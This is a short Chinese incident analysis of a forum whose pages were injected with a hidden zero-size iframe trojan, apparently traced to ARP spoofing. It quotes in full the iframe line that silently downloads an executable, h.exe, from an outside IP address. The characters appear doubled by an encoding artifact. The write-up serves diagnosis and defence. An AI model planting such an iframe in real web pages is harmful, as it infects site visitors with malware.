行業(yè)動(dòng)態(tài)
服務(wù)器掛iframe木馬分析
發(fā)布日期:2012-11-26 閱讀次數(shù):5588 字體大小:

  昨日接到某論壇的求助,論壇中被掛iframe木馬,當(dāng)訪問(wèn)論壇時(shí)發(fā)現(xiàn)每個(gè)頁(yè)面的置頂有個(gè)iframe木馬,代碼如下<iframe src= http://222.113.57.47:369/h.exe width=0 height=0></iframe> 360自動(dòng)提示有木馬,系統(tǒng)會(huì)彈出一個(gè)載下h.exe的對(duì)話框。由于論壇是當(dāng)天剛出現(xiàn)的情況,服務(wù)器中就放置了一個(gè)論壇,分析有可能有以下幾種情況。

  1.  論壇被攻擊
  2.  IIS被置入木馬
  3.  ARP攻擊

  針對(duì)第一種情況找到論壇中改過(guò)的文件與模板,并未發(fā)現(xiàn)相關(guān)被篡改的內(nèi)容,第一種情況排除。接下來(lái)接以下兩種思路來(lái)尋找解決方法,在論壇中新建兩個(gè)文件,一個(gè)是1.html、一個(gè)是1.php 無(wú)需輸入內(nèi)容。通過(guò)論壇網(wǎng)址訪問(wèn)  網(wǎng)址/1.html 訪問(wèn)此頁(yè)面沒(méi)發(fā)現(xiàn)異常、訪問(wèn)1.php發(fā)現(xiàn)被自動(dòng)掛馬,也就是說(shuō)當(dāng)運(yùn)行PHP的文件時(shí)會(huì)自動(dòng)掛馬,那么IIS被置入木馬的可能情就大些,(IIS被置入木馬分析:如PHP解析的文件被篡改,也會(huì)出現(xiàn)以上的情況)按IIS的配置進(jìn)行查找也未發(fā)現(xiàn)問(wèn)題。

  懷疑可能是服務(wù)器所在的局域網(wǎng)或網(wǎng)絡(luò)有ARP攻擊,從網(wǎng)上下載一個(gè)ARP防火墻后重啟服務(wù)器,發(fā)現(xiàn)問(wèn)題解決,每個(gè)頁(yè)面中已經(jīng)沒(méi)有iframe的木馬。訪問(wèn)論壇首頁(yè)和原建立的1.php頁(yè)面也已正常。但訪問(wèn)論壇子頁(yè)時(shí)360仍提示有木馬,但子頁(yè)的代碼已無(wú)iframe的內(nèi)容。這種情況可能是論壇訪問(wèn)過(guò)大,多用戶同時(shí)訪問(wèn)子頁(yè),360有云計(jì)算會(huì)將原有木馬的網(wǎng)站或頁(yè)面自動(dòng)提交到云服務(wù)器中,以致及時(shí)清除木馬后360的云服務(wù)器還沒(méi)有反映過(guò)來(lái)才出現(xiàn)的誤報(bào)情況。

  在些易天科技提示服務(wù)器管理員除作好站點(diǎn)的安全防范外,應(yīng)對(duì)服務(wù)器作相關(guān)的安全設(shè)置。安裝必要的軟件。